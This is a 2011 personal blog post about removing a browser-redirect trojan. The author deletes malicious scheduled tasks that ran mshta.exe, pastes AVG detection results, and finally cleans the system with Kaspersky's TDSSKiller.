Tuesday, January 25, 2011

Browser Redirect Virus

So I had this virus that was redirecting my browsers, AVG, Spybot and MalwareBytes did not detect anything. After running Hijackthis, I noticed some scheduled tasks. When I checked my Task scheduler I notice 23 Scheduled tasks, that ran mshta.exe and some URL. I deleted all of these scheduled tasks,searched my C drive for mshta.exe and deleted all instances of it(may need to use Unlocker to do this).

Once I rebooted I ran AVG, Spybot and MalwareBytes again, AVG found 4 things and could not remove them:

"C:\WINDOWS\system32\svchost.exe (1652):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\system32\svchost.exe (1652)";"Trojan horse Agent_r.XJ";""
"C:\WINDOWS\explorer.exe (636):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\explorer.exe (636)";"Trojan horse Agent_r.XJ";""

After some google'ing I found someone recommending TDSSKiller from Kaspersky. So I ran this program and it found 2 threats and removed them with a reboot, healed my system completely, AVG scan confirmed this.


Download Link: http://support.kaspersky.com/downloads/utils/tdsskiller.zip

No comments:

Post a Comment

Thanks for your input.

PiKVM to NVR

  Trying to connect to your IP Camera Network Video Recorder (NVR) via your PiKVM and it’s not working? No video from the NVR on...